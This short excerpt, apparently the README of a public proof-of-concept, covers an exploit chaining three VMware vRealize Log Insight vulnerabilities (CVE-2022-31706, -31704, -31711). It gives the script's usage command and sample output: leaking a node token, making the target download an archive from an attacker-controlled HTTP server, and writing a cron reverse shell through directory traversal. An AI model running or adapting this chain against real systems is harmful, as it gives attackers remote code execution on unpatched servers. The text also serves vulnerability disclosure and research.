- VMware vRealize Log Insight directory traversal vulnerability (CVE-2022-31706)
- VMware vRealize Log Insight broken access control vulnerability (CVE-2022-31704)
- VMware vRealize Log Insight information disclosure vulnerability (CVE-2022-31711)
Usage
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
Troubleshooting
sudo chown root:root payload
sudo chmod 0644 payload
Originally published on the WeChat official account (安全客): Researchers release PoC exploit code for VMware (CVE-2023-34051)